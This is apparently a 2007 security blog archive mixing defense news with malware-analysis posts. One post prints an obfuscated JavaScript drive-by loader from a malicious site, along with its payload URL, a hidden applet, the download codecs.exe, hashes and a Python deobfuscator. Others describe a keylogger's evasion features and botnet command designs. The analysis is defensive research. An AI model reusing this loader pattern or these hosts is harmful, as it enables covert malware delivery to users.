Visualization in military briefings and intelligence gathering has been a daily lifestyle of analysts for years, but combining visualization and touchscreens makes it the perfect combination to boost productivity. We're very near to entering the stage where VR will not only save lives in a war zone, but also allow a skilled and hard to replace warrior to operate a device while enjoying his Coke back home. Great demonstration. Via Defensetech.

Go through related posts on visualization and its future impact on information security and intelligence as well.

Sunday, March 11, 2007

Ballistic Missile Defense Engagement Points

Outstanding animation covering pretty much all of the current engagement points in case a missile is fired from anywhere across the world, total synchronization between air, land and naval forces, and I must say the background music is excellent too.



In a previous post, Who Needs Nuclear Weapons Anymore?, I provided my reflection on the overall shift of threats nowadays compared to the ones back in the Cold War days, which you may find informative, as well as an essay I wrote back in 1998. Cryptome's Eyeballing of Missile Defense is also worth going through.

Saturday, March 10, 2007

Vladuz's Ebay CAPTCHA Populator

Nice slideshow courtesy of eWeek providing various screenshots related to Vladuz's impersonation attacks on Ebay :

"And whether or not Vladuz is responsible for writing a tool to automatically skim eBay customers accounts and thus cause sharp spikes in bogus listings being taken down and relisted multiple times a day, he or she has the mythic reputation at this point to be credited as the cause."

Compared to diversifying his targets, permanently sticking to Ebay as the main target is already prompting the Web icon to put more effort into tracking him down. Last year for instance, automated bots exploited Ebay's CAPTCHA and started self-recommending each other, but with Vladuz's Ebay CAPTCHA Populator, improving the quality of Ebay's authentication process should get a higher priority than tracking him down, as another such tool will follow from someone else out there.

Photoshoping Your Reality

It's not just a stereotyped beauty model that advanced image editing tools and techniques can make you believe in; they can also influence your understanding of reality, as you can see in Wired's famous altered photos collection :

"A picture is worth a thousand words, and Photoshop and similar tools have made it easier than ever to make those words fib. But while computers enable easier and better photo manipulation, it is hardly a new phenomenon. Here is a sampling of some of the more famous altered photographs from the last century."

Here's a free service letting you fake photos. Here's another one as well as a variant of mine in relation to a previous post.

Shots from the Malicious Wild West - Sample Three

Keyloggers on demand, the so called zero day keyloggers, ones created especially to be used in targeted attacks, are something rather common these days. Among the many popular ones that have remained in service and been updated for over a year is The Rat! Keylogger. Here are some prices in virtual WMZ money for all of its versions :

The Rat! 7.0XP - 29 WMZ
The Rat! 6.0XP/6.1 - 22 WMZ
The Rat! 5.8XP - 15 WMZ
The Rat! 5.5XP - 13 WMZ
The Rat! 5.0XP - 9 WMZ
The Rat! 4.0XP - 8 WMZ
The Rat! 3.xx - 7 WMZ
The Rat! 2.xx - 6 WMZ

An automated translation of its features :

For installation on machines running Windows XP, Windows 2000 and systems based on them. Finale - apotheosis! Let us recall once more what we love our rodent for:
- the resulting file is record small: 13 312 bytes unpacked (6 793 bytes when packed with FSG!).
- not detected as a virus by antivirus software.
- monitors the clipboard.
- stealth system and firewall bypass.
- captures keystrokes in password windows and the console.
- sends logs by e-mail, with support for RFC 2554 authentication.
- encoding of the dump.
- configurable activation and stop times.
- self-removal at the specified time, without trace and without a reboot.

Digital fingerprints will follow as soon as I finish bruteforcing the password protected archives.

Shots from the Malicious Wild West - Sample Two

Packers are logically capable of rebooting the lifecycle of a binary and making it truly unrecognizable. The Pohernah Crypter is among the many recently released packers you might be interested in taking a peek at. By the time a packer's pattern becomes recognizable, a new one is introduced, and in special cases there are even packers taking advantage of flaws in an AV software itself.

Compared to the common wisdom of malware authors being self-sufficient and coming up with packers by themselves, we've already seen cases where investment in purchasing commercial anti-debugging software is considered. You may find these test results of various anti-virus software against packed malware informative; as a matter of fact they truly back up my experience with the winning engines and their performance in respect to packed malware.

File size: 6901 bytes
MD5: 6ce1283af00f650e125321c80bf42097
SHA1: 08ac9a9e2181d8a94e6d96311c21c8db1766e2f1

Shots from the Malicious Wild West - Sample One

Come to daddy. At _http://www.ms-counter.com we have a URL spreading malware through redirectors and the natural javascript obfuscation :

Input URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Effective URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Responding IP: 81.95.148.10
Name Lookup Time: 0.300643
Total Retrieval Time: 0.887313
Download Speed: 9878

Then we get the following :




var keyStr = "ABCDEFGHIJKLMNO"+"PQRSTUVWXYZabcdefghijk"+"lmnopqrstuvwx"+"yz0123456789+/="; // base64 alphabet, split into fragments
function decode64(input) { // a plain base64 decoder
    var output = "";
    var chr1, chr2, chr3;
    var enc1, enc2, enc3, enc4;
    var i = 0;
    input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); // drop anything outside the alphabet (line breaks included)
    do {
        enc1 = keyStr.indexOf(input.charAt(i++));
        enc2 = keyStr.indexOf(input.charAt(i++));
        enc3 = keyStr.indexOf(input.charAt(i++));
        enc4 = keyStr.indexOf(input.charAt(i++));
        chr1 = (enc1 << 2) | (enc2 >> 4); // four 6-bit values back into three bytes
        chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
        chr3 = ((enc3 & 3) << 6) | enc4;
        output = output + String.fromCharCode(chr1);
        if (enc3 != 64) { output = output + String.fromCharCode(chr2); } // index 64 is the '=' padding
        if (enc4 != 64) { output = output + String.fromCharCode(chr3); }
    } while (i < input.length);
    return output;
}
document.write(decode64("IDxhcHBsZXQgYXJjaGl2ZT0ibXMtY291bnRlci5q
YXIiIGNvZGU9IkJhYWFhQmFhLmNsYXNzIiB3aWR0aD0xIGhlaWdodD
0xPjxwYXJhbSBuYW1lPSJ1cmwiIHZhbHVlPSJodHRwOi8vbXMtY291b
nRlci5jb20vbXMtY291bnRlci9sb2FkLnBocCI+PC9hcHBsZXQ+PHNjcml
wdCBsYW5ndWFnZT0nam ETC. ETC. ETC.
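Getting at what the script above writes into the page doesn't need a browser. The following Python script, added here and not part of the original post, pulls the literal out of the captured decode64() call, decodes it in the same lenient way the page's decoder does (tolerating the truncated tail), and picks out the applet archive, class and load URL it reveals; the function names are my own.

```python
import base64
import re

# The decode64() call exactly as captured from the ms-counter.com page quoted
# above; the post cuts the literal off ("ETC."), so its tail is an incomplete
# base64 group and a naive b64decode() would raise an error.
CAPTURED_SCRIPT = """document.write(decode64("IDxhcHBsZXQgYXJjaGl2ZT0ibXMtY291bnRlci5q
YXIiIGNvZGU9IkJhYWFhQmFhLmNsYXNzIiB3aWR0aD0xIGhlaWdodD
0xPjxwYXJhbSBuYW1lPSJ1cmwiIHZhbHVlPSJodHRwOi8vbXMtY291b
nRlci5jb20vbXMtY291bnRlci9sb2FkLnBocCI+PC9hcHBsZXQ+PHNjcml
wdCBsYW5ndWFnZT0nam"))"""

NOT_BASE64 = re.compile(r"[^A-Za-z0-9+/=]")


def extract_decode64_args(script: str) -> list:
    """Return every string literal handed to decode64() in the script."""
    return re.findall(r'decode64\(\s*"([^"]*)"', script)


def decode64_lenient(blob: str) -> bytes:
    """Decode like the page's decode64(): anything outside the alphabet is
    dropped (that is how the line breaks inside the literal are ignored), and
    a truncated capture is handled by re-padding or discarding the final
    partial group instead of failing."""
    clean = NOT_BASE64.sub("", blob).rstrip("=")
    rem = len(clean) % 4
    if rem == 1:            # a single dangling character holds no whole byte
        clean = clean[:-1]
    elif rem:               # two or three characters still yield 1 or 2 bytes
        clean += "=" * (4 - rem)
    return base64.b64decode(clean)


def loader_details(markup: str) -> dict:
    """Pull the indicators an analyst wants out of the revealed HTML."""
    details = {}
    applet = re.search(r'<applet[^>]*\barchive="([^"]+)"[^>]*\bcode="([^"]+)"', markup)
    if applet:
        details["archive"], details["class"] = applet.groups()
    param = re.search(r'<param\s+name="url"\s+value="([^"]+)"', markup)
    if param:
        details["payload_url"] = param.group(1)
    # a 1x1 applet is there to run, not to be seen
    details["hidden"] = re.search(r"width=1\s+height=1", markup) is not None
    # the literal was cut off inside a second <script>: another stage follows
    details["second_stage_script"] = "<script" in markup
    return details


def analyse(script: str = CAPTURED_SCRIPT) -> dict:
    """Static deobfuscation: no browser, no JavaScript engine, nothing fetched."""
    blob = "".join(extract_decode64_args(script))
    markup = decode64_lenient(blob).decode("latin-1")
    result = loader_details(markup)
    result["markup"] = markup
    return result


if __name__ == "__main__":
    for key, value in analyse().items():
        print(f"{key}: {value}")
```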

Deobfuscating the javascript we get to see where the binary is :

Input URL: _http://ms-counter.com/mscounter/load.php
Effective URL: _http://ms-counter.com/mscounter/load.php
Responding IP: 81.95.148.10
Name Lookup Time: 0.211247
Total Retrieval Time: 1.065943
Download Speed: 12898

Server Response :
HTTP/1.1 200 OK
Date: Sat, 10 Mar 2007 00:49:27 GMT
Server: Apache
X-Powered-By: PHP/4.4.4
Content-Disposition: attachment; filename="codecs.exe"
Connection: close
Transfer-Encoding: chunked
Content-Type: application/exe

File info :
File size: 13749 bytes
MD5: f0778c52e26afde81dffcd5c67f1c275
SHA1: d61c6c17b78db28788f9a89c12b182a2b1744484

Running it over VT we get the results you can see in the screenshot. It's obvious major AV software doesn't detect this one, but what you should keep in mind is the currently flawed signature-based malware detection approach. That's of course given someone's considering updating their AV software. In another analysis I'll come up with another binary that all major AV vendors detect, but the second tier ones don't. Host-based IPS protection and behaviour blocking, and the actual prevention of loading the script, are the way to avoid the exploitation of the flaws in signature-based scanning protection.

Friday, March 09, 2007

Envy These Women Please

Differentiating from the usual Most Powerful Women list, Forbes did a little niching to come up with a slideshow of women billionaires they envy most :

"Imagine for a moment what it would be like to be a billionaire. No more picking up after the kids, doing dishes, worrying about how much a dress costs or pinching pennies to save for an amazing vacation. For the women on Forbes' new list of the world's billionaires, that dream is a reality. But it's not just their 10-figure fortunes that make us envious. Some of these women are famous; some wield enormous power; some have fascinating careers. Some have all three."

Is it just me, or is inherited wealth boring right from the very beginning? The emergence of the spoon people, or so they say -- "Spoon feeding in the long run teaches us nothing but the shape of the spoon" Edward Morgan Forster. A week ago I participated in a discussion about power, most importantly one trying to define power, and we ended up with several states of power: positional power (the C-level executives), expertise power (or the revenge of the underestimated walking case studies), and networking power. It's all a cyclical process like pretty much anything in life.

U.K's Latest Military Satellite System

The U.K military is about to upgrade their Skynet 4 satellite system to Skynet 5 :

"Four steerable antennas give it the ability to focus bandwidth on to particular locations where it is most needed - where British forces are engaged in operations. Its technologies have also been designed to resist any interference - attempts to disable or take control of the spacecraft - and any efforts to eavesdrop on sensitive communications. An advanced receive antenna allows the spacecraft to selectively listen to signals and filter out attempts to "jam" it."

Among the many features the new system introduces, two are worth mentioning: its targeted bandwidth capability where it's needed, and the sort of DENY:ALL upgraded receive antenna to avoid jamming. Now pray China won't take it down, or let the debris (conveniently) take care of the rest -- so vulnerable it makes you want to establish a space warfare code of conduct.

Armed Land Robots

After seeking to dominate the air, it's time defense contractors turn back to innovating on the ground, especially when we speak of armed and remotely controlled robots. Crucial for both reconnaissance and guerilla warfare situations, movement flexibility as well as payload capacity is what adds more value to these robots. The Israeli defense contractor Elbit Systems recently introduced The Viper :

"The Viper, which is about a foot long and weighs approximately five pounds, is powered by a special electrical engine and operated by remote control or according to a program implanted in its 'brain' in advance. It is capable of climbing stairs, getting past obstacles and at the same time checks what is going on around it by means of a system of sensors. Equipped with a special nine-millimeter caliber Uzi machine gun, on which a laser pointer has been installed. The Viper is carried to the battlefield by a soldier on his back in a special carrier. When it is necessary to infiltrate a building safely where, for example, armed terrorists are hiding, the soldier lowers it to the ground, turns it on and from that moment controls it from a distance."

I'm very interested in the possibility of a 360 degree view, its noise generation level, the variety of terrains it supports, and most importantly, whether it would put itself back on its "feet" if it inevitably turns upside down. See, you wouldn't want your pricey attack toy acting like a cheap remotely controlled car toy, would you? Engadget has a photo of the Viper.

Here's a recommended article on the history of armed aerial UAVs, as well as a recent story on beam energy weapons, the vomit beam in this case.

Thursday, March 08, 2007

UK Telecoms Lack of Web Site Privacy

When the U.S and Canada are the benchmark, it's logical to conclude the U.K gets poor ratings, as web site privacy, especially in the commercial sector, is something the U.S and Canada tackled a long time ago. Taking the pragmatic perspective, does it really matter in times when government officials abuse commercially aggregated data, data they cannot legally obtain by themselves, so that they have to perform as paper-tigers to access it? Here's an interesting analysis :

"The U.K. industry, however, performed much worse in privacy. Telecom firms, especially in the U.K., ask for more personal data than companies in other industries. This data is often unconnected to the request being made by the customer.

U.K. sites are generally unclear about data sharing practices, with 23 per cent judged to be explicit compared to 69 per cent in the U.S. Clarity in this area has made steady gains in the U.S. in the past 12 months, but the U.K. has shown no significant change.

It is not only clarity that fails in the U.K., but also the actual practices in place. Eleven of the 13 sites routinely share personal data with other internal groups, business partners or third parties without explicit permission. This compared poorly with the U.S., where 40 per cent share in the same way. The best performing site with regards to privacy in the U.K. was O2."

Moreover, the U.K, realizing its ongoing negative PR across the globe in respect to the CCTV surveillance myopia, has released a report claiming Italy's COMINT is worse than its (walking) CCTV surveillance efforts. To publish a privacy policy or not to publish a privacy policy? That "used to be" the question.

Steganography Applications Hash Set

Did you know that there are over 600 applications capable of using steganography to hide data? Me neither, but here's a company that's innovating in the field of detecting such ongoing communication :

"Backbone Security’s Steganography Analysis and Research Center (SARC) is pleased to announce the release of version 3.0 of SAFDB. With the fingerprints, or hash values, of every file artifact associated with 625 steganography applications, SAFDB is the world’s largest commercially available hash set exclusive to digital steganography and other information hiding applications. The database is used by Federal, state and local law enforcement; intelligence community; and private sector computer forensic examiners to detect the presence or use of steganography and extract hidden information.

Version 3.0 contains hash values for each file artifact associated with the 625 steganography applications computed with the CRC-32, MD5, SHA-1, SHA-224, SHA-256, SHA-384, and SHA-512 algorithms.

A free extract of SAFDB with MD5 hashes only is available to qualifying law enforcement, government, and intelligence agency computer forensic examiners."

Chart courtesy of Huaiqing Wang and Shuozhong Wang. And here's a related post.

Distributed Computing with Malware

Distributed computing with malware infected PCs is nothing new as a concept; what's lacking is the botnet masters' desire to contribute processing power to anything socially oriented. That's until late last month, when members of Berkeley's BOINC project noticed a project that was suspiciously becoming popular and found out that malware infected PCs had the BOINC client installed to participate in it :

"It recently came to the attention of boinc staff that a multi-project cruncher called Wate who occupied a very high position in the boinc and project stats had reached this exalted position by dishonest means. In early June 2006 he appears to have released onto the internet a link purporting to provide Windows updates including now for Vista. Some 1500 members of the public worldwide downloaded these 'updates' which in fact consisted of a trojan application that downloaded boinc.exe and attached the person's computer to Wate's account, giving him the subsequent fraudulent credits. About 90% of the people affected appear to have uninstalled or disabled the unwanted boinc installation, but some compromised computers are still running and crashing climate models. Boinc and project staff have no means of contacting the owners of these computers."

If only botnet masters would take this note seriously, I'm sure we'd see certain networks controlling the top 10 positions at the BOINC project. A war on bandwidth or CPU power?

Wednesday, March 07, 2007

Documentary on ECHELON - The Spy System

Remember ECHELON? The über-secretive worldwide intelligence sharing network that various activists once tried to poison by generating fake suspicious traffic using predefined keywords? Well, the system is still operating, and with the lack of transparency in the participating countries' use and abuse of the technology, all we need is an EU alternative competing with the original.

Watch this excellent half an hour long documentary and find out : "What exactly is Echelon? How can it invade privacy, yet protect liberty? How did this billion-dollar system miss the September 11th attacks? In a riveting hour, we uncover the mysterious, covert world of NSA's electronic espionage."

USB Surveillance Sticks

Despite the ongoing awareness built among enterprises and end users on the risks posed by removable media, there are vendors offering various surveillance solutions on a USB stick. Some are handy, others contradictory. And while RFID tags are getting smaller than a grain of rice, here are three surveillance solutions to keep in mind right next to the notorious KeyGhost hardware keylogger.

SnoopStick
An example of malware on demand at $59.95 which comes with lots of features as well as automatic updates :

"The SnoopStick monitoring components are completely hidden, and there are no telltale signs that the computer is being monitored. You can then unplug the SnoopStick and take it with you anywhere you go. No bigger than your thumb and less than 1/4" thick, you can carry it in your pocket, purse, or on your keychain. Any time you want to see what web sites your kids or employees are visiting, who they are chatting with, and what they are chatting about, simply plug in your SnoopStick to any Windows based computer with an Internet connection and a USB port. SnoopStick will automatically connect to the target computer."

TrackStick
Portable GPS surveillance with historical routes that look simply amazing when applied at Google Earth :

"The Track Stick will work anywhere on the planet Earth. Using the latest in GPS mapping technologies, your exact location can be shown on graphical maps and 3D satellite images. The Track Stick's micro computer contains special mathematical algorithms, that can calculate how long you have been indoors. While visiting family, friends or even shopping, the Track Stick can accurately time and map each and every place you have been."

GadgetTrack
An interoperable surveillance solution supposed to assist you in case your iPod or even PSP gets stolen; all you have to do is infect your device and pray there's Internet connectivity at a later stage. Tracking your stolen devices is one thing, getting them back is completely another :

"What if your device could phone home? Well now it can. With our patent-pending GadgetTrak™ system, you simply register your device and install our agent files on your device. If your device is missing or stolen, you log into your account and flag the device as lost or stolen. The next time the device is accessed it will attempt to contact us and provide data regarding the system it is plugged into."

Death is Just an Upgrade

Started as a project to digitally mimic 100% a human's behaviour, the Virtual Soldier research program is getting more funding to accomplish its mission, and go beyond :

"In particular, the contract calls for the VSR team to further develop their "Predictive Dynamics" tools for use in calculating human motion in a military environment. Invented by VSR researchers, the field of Predictive Dynamics already has made a significant impact on the field of human motion simulation by making it possible -- for the first time ever -- to calculate the walking and running involved in human gait when given such variables as human body size, strength, weight, load-carrying abilities and clothing effects."

Next, Santos will find himself exposed to radiation, blown to pieces, hit by a truck, or pretty much anything that you would never get the chance to -- legally -- expose a living human to, for testing purposes.

Botnet Communication Platforms

Botnets, or the automated exploitation and management of malware infected PCs, are perhaps the most popular and efficient cyber threat the Internet faces these days. Whether you define it as the war on bandwidth or as who's commanding the largest infected population, this simple distributed hosts management problem is continuing to evolve in order for the botnet masters to remain undetected for as long as possible. On the other hand, the growing Internet population combined with the lack of awareness of the "just got a PC for Christmas" users, and IPv4's well known susceptibility to IP spoofing compared to IPv6, always make the concept an interesting one to follow.

Despite the fact that at the beginning of 2006 I pointed out how malware related documentation and howtos turned into open source code, resulting in a flood of malware variants and thus lowering the entry barriers for novice malware copycats, a week ago I located a very thorough document on various botnet communication platforms, and I'm sure its author wouldn't mind me reposting the fancy graphs and commenting on them.

IRC based Botnet Communications
Nothing ground breaking in this one besides the various advice on stripping the IRCd, creating one's own network of IRC servers rather than using public ones, and on the importance of distributed secrecy of the botnet participants' IPs, namely that each bot would never know the exact number or location of all servers and bots.

HTTP Botnet Communications

The possibilities with PHP and MySQL in respect to flexibility of the statistics, layered encryption and tunneling, and most importantly decentralizing the command, even improving authentication with port knocking, are countless. Besides, with all the buzz about botnets continuing to use IRC, it's a rather logical move for botnet masters to shift to other platforms, where communicating in between HTTP's noise improves their chance of remaining undetected. Rather ironically, the author warns of possible SQL injection vulnerabilities in the botnet's command panel.

ICQ Botnet Communications
Perhaps among the main reasons to repost these graphs was the ICQ communication platform, which I'll leave up to you to figure out. The reliance on icq.com is listed as a major weakness, but as we've already seen cases of botnets obtaining their commands by visiting an IRC channel and processing its topic, in this case it's ICQ WhiteLists getting the attention.

Related comments on the programming "know-how" discussed will follow. Know your Enemy!